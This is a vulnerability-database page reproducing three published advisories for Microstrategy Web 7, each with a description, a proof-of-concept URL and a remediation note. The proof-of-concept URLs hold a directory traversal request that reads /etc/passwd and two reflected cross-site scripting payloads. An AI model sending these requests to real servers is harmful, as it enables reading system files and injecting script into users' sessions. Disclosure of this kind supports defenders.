Registermicrostrategy web 7 crosssite scripting directory traversal
▸▸▸ Exploit & Vulnerability >> webapps exploit & jsp vulnerability
Online Vulnerability Scanner Tools
Code...
<!-- # Exploit Title: Path traversal vulnerability in Microstrategy Web version 7 # Date: 29-10-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.microstrategy.com # Software Link: https://www.microstrategy.com # Version: Microstrategy Web version 7 # Tested on: all # CVE : CVE-2018-18777 # Category: webapps 1. Description Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. 2. Proof of Concept http://X.X.X.X/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd 3. Solution: The product is discontinued. Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Microstrategy Web version 7 # Date: 29-10-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.microstrategy.com # Software Link: https://www.microstrategy.com # Version: Microstrategy Web version 7 # Tested on: Unix # CVE : CVE-2018-18775 # Category: webapps 1. Description Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter. 2. Proof of Concept http://X.X.X.X/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg= "><script>alert("XSS");</script><" 3. Solution: The product is discontinued. Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Microstrategy Web version 7 # Date: 29-10-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.microstrategy.com # Software Link: https://www.microstrategy.com # Version: Microstrategy Web version 7 # Tested on: all # CVE : CVE-2018-18776 # Category: webapps 1. Description Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the admin.asp ShowAll parameter. 2. Proof of Concept http://X.X.X.X/microstrategy7/admin/admin.asp?ShowAll= "><script>alert("XSS")</script><"&ShowAllServers=show 3. Solution: The product is discontinued. Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules -->
Microstrategy web 7 crosssite scripting directory traversal Vulnerability / Exploit Source : Microstrategy web 7 crosssite scripting directory traversal
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes